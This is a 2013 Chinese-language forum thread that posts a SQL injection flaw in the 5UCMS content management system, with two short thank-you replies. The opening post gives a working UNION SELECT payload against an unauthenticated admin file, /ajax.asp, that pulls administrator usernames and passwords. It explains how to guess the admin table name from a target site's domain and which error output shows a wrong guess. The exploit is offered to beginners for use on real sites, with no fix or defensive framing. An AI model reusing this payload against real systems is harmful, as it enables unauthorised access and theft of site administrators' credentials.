5UCMS SQL注入漏洞

社区服务
高级搜索
猴岛论坛电脑百科5UCMS SQL注入漏洞
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
2个回复

[技术小组]5UCMS SQL注入漏洞

楼层直达
菲菲43595309

ZxID:17298746

等级: 禁止发言
举报 只看楼主 使用道具 楼主   发表于: 2013-06-20 0
5UCMS SQL注入漏洞
漏洞类型:SQL注入
漏洞描述:后台目录/ajax.asp
因未进行后台用户验证,导致未登陆也可访问此文件,文件存在sql注入。

测试代码:

ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from xxxx_Admin&id=1%20and%201=2%20UNION%20select%201%20from xxxx_Admin

xxxx_Admin这个表名一般都是他们在安装的时候自定以的,一般都是用域名 比如www.xxxa.com这个站 表名可能就是xxxa_admin 大家自己修改。没什么技术含量 一般新手暴不出来所以才发出来

说实话他们的程序还是比较安全的能搞出个也不错了。对于我们这些菜鸟来说。

出现:True|False|ERR: Object required 证明表名添写错误了。
十一年627f

ZxID:26135693

等级: 中尉
举报 只看该作者 沙发   发表于: 2013-06-21 0
顶~~~~
求大神教技术!
智盛卡盟

ZxID:17871842

等级: 禁止发言

举报 只看该作者 板凳   发表于: 2013-06-21 0
感谢分享!
« 返回列表
发帖 回复